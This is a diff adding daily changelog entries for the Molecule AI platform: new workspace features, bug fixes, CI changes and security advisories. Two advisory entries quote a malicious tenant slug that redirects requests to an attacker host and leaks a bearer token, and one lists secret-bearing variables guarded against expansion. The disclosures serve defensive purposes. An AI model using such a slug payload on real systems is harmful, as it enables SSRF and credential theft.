|
|
|
@@ -8,6 +8,57 @@ Entries are published daily at 23:50 UTC.
|
|
|
|
|
|
|
|
|
|
---
|
|
|
|
|
|
|
|
|
|
## 2026-05-15
|
|
|
|
|
|
|
|
|
|
### ✨ New features
|
|
|
|
|
|
|
|
|
|
- **Self-hosted workspace Docker deployment guide**: a new [Self-hosted workspace with Docker](/docs/self-hosting) tutorial covers end-to-end deployment of a Molecule AI workspace using Docker — including image pulling, environment configuration, volume mounts, and health-check verification. Includes a corrected Kubernetes YAML example (`terminationGracePeriodSeconds: 120` to match the liveness probe threshold) and a SIGTERM graceful shutdown code example. (`docs` [#46](https://git.moleculesai.app/molecule-ai/docs/pulls/46))
|
|
|
|
|
- **`dev-channels` flag requirement documented**: a new [dev-channels flag reference page](/docs/runtime-mcp/dev-channels-flag) explains why Claude Code 2.1.x+ requires `--dangerously-load-development-channels server:molecule` (the tagged allowlist form, not the bare `--dangerously-skip-ipc-lockfile` flag) for inline channel push from the molecule MCP wheel. Covers the three-layer failure mode when the bare flag is used and how the tagged form resolves it. (`docs` [#30](https://git.moleculesai.app/molecule-ai/docs/pulls/30))
|
|
|
|
|
- **Workspace ability flags: broadcast and talk-to-user**: two new workspace-level ability flags — `broadcast_enabled` (default `false`) and `talk_to_user_enabled` (default `true`) — give org admins fine-grained control over workspace-to-user communication. `broadcast_enabled` enables the `broadcast_message` MCP tool, which fans out an org-wide notification to all non-removed peer workspaces. `talk_to_user_enabled=false` causes `send_message_to_user` and `POST /notify` to return HTTP 403 with a hint to use `delegate_task` instead; the canvas ChatTab shows a banner with an Enable button. Both flags are toggled independently via `PATCH /workspaces/:id/abilities` (AdminAuth). The `AgentMessageWriter` is the single gate for the talk-to-user check across both MCP and HTTP paths. (`molecule-core` [#1121](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1121))
|
|
|
|
|
|
|
|
|
|
### 🔧 Fixes
|
|
|
|
|
|
|
|
|
|
- **MCP HTTP/SSE transport gap-fill**: `content/docs/mcp-server.mdx` updated with a Transport modes section documenting stdio (Claude Code / Cursor) vs HTTP/SSE (remote / headless agents) operation, SSE heartbeat behaviour (`data: null` every 30s on idle connections), and a troubleshooting entry for "Port already in use". The environment variables table now includes `MCP_SERVER_PORT` (default 3000) and `MOLECULE_API_KEY`; `.mcp.json` examples now show `MOLECULE_API_KEY` for both self-hosted and SaaS configurations. (`docs` [#44](https://git.moleculesai.app/molecule-ai/docs/pulls/44))
|
|
|
|
|
- **Remote workspaces graceful shutdown**: `run_heartbeat_loop()` and `run_agent_loop()` in the workspace runtime now accept a `threading.Event` (`stop_event` parameter). Setting the event causes the loop to exit cleanly and return `"stopped"` — enabling graceful SIGTERM, Kubernetes, and Docker shutdown for remote agents. The quick-start code example in `content/docs/guides/remote-workspaces.md` has been updated with a SIGTERM handler. (`docs` [#29](https://git.moleculesai.app/molecule-ai/docs/pulls/29))
|
|
|
|
|
- **`PLATFORM_URL` default corrected across docs**: `http://platform:8080` (unreachable inside Docker) replaced with `http://host.docker.internal:8080` in `workspace-runtime.md`, `molecule-technical-doc.md`, and `local-development.md`, matching the corrected runtime default. (`docs` [#32](https://git.moleculesai.app/molecule-ai/docs/pulls/32))
|
|
|
|
|
- **OpenClaw external workspace heartbeat fix**: the OpenClaw workspace template's `pip install` command now pins `molecule-ai-workspace-runtime>=0.1.999`, ensuring workspaces automatically receive the `molecule-mcp` console script which POSTs `/registry/register` on startup and runs a 20-second heartbeat thread. Older versions shipped only `a2a_mcp_server` which does not heartbeat, causing workspaces to show OFFLINE within 60 seconds of startup. (`molecule-core` [#1143](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1143))
|
|
|
|
|
- **Minimax/Moonshot model routing fixed in OpenClaw**: the OpenClaw adapter was routing all non-qianfan model prefixes (including minimax and moonshot/kimi) to `OPENAI_API_KEY` + `api.openai.com`, causing a NOT CONFIGURED error for any workspace with only `MINIMAX_API_KEY` or `KIMI_API_KEY` set. Replaced the if/else cascade with explicit per-prefix lookup tables covering all six providers (openai, groq, openrouter, qianfan, minimax, moonshot). (`molecule-ai-workspace-template-openclaw` [#5](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/5))
|
|
|
|
|
|
|
|
|
|
### 🔒 Security
|
|
|
|
|
|
|
|
|
|
- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `validate_slug()` with RFC-1123 regex validation before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41))
|
|
|
|
|
- **CWE-22 path traversal regression advisory added**: the [Security Changelog](/docs/security/changelog) has been updated with the CWE-22 path traversal regression in `org_import.go` (molecule-core [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/810), merged 2026-05-13). A regression removed the `resolveInsideRoot` guard from `createWorkspaceTree`; the fix restores it via `loadWorkspaceEnv`. (`docs` [#31](https://git.moleculesai.app/molecule-ai/docs/pulls/31))
|
|
|
|
|
|
|
|
|
|
### 🧹 Internal
|
|
|
|
|
|
|
|
|
|
- **SOP checklist merge gate added to docs CI**: the [SOP checklist merge gate](/.gitea/workflows/sop-checklist-gate.yml) is now installed in the docs repo, requiring PR authors to complete a 7-item checklist and receive peer `/sop-ack` comments before merging. (`docs` [#27](https://git.moleculesai.app/molecule-ai/docs/pulls/27))
|
|
|
|
|
- **Changelog structural fixes**: duplicate `## 2026-05-10` section removed and `## 2026-04-23` repositioned to its correct chronological position; daily changelog entries for 2026-05-13 aggregated across all org PRs. (`docs` [#28](https://git.moleculesai.app/molecule-ai/docs/pulls/28), [#37](https://git.moleculesai.app/molecule-ai/docs/pulls/37), [#36](https://git.moleculesai.app/molecule-ai/docs/pulls/36), [#33](https://git.moleculesai.app/molecule-ai/docs/pulls/33))
|
|
|
|
|
- **ProviderRegistry routing abstraction added**: `adapter_base.py` now exports a `ProviderRegistry` type alias and `resolve_provider_routing(model_str, env, *, registry, runtime_config)` utility — mechanism-only, no hardcoded data; each adapter supplies its own registry. Enables runtime-level model-to-provider routing without duplication. (`molecule-core` [#1138](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1138))
|
|
|
|
|
- **GitHub Actions workflows ported to Gitea Actions**: the OpenClaw workspace template's `.github/workflows/` directory has been fully ported to `.gitea/workflows/`, removing the GitHub-org dependency and enabling CI to run natively on the Gitea instance. (`molecule-ai-workspace-template-openclaw` [#6](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/6))
|
|
|
|
|
|
|
|
|
|
---
|
|
|
|
|
|
|
|
|
|
## 2026-05-14
|
|
|
|
|
|
|
|
|
|
### 🔒 Security
|
|
|
|
|
|
|
|
|
|
- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables — blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
|
|
|
|
|
- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Fix applies `validate_slug()` — RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) that rejects non-conforming slugs with exit code 64 before any network call is issued. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
|
|
|
|
|
- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization — so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073))
|
|
|
|
|
|
|
|
|
|
### 🐛 Bug fixes
|
|
|
|
|
|
|
|
|
|
- **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990))
|
|
|
|
|
- **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988))
|
|
|
|
|
- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers → a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4))
|
|
|
|
|
|
|
|
|
|
### 🧹 Internal
|
|
|
|
|
|
|
|
|
|
- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035))
|
|
|
|
|
- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999))
|
|
|
|
|
|
|
|
|
|
---
|
|
|
|
|
|
|
|
|
|
## 2026-05-12
|
|
|
|
|
|
|
|
|
|
### 🔒 Security
|
|
|
|
|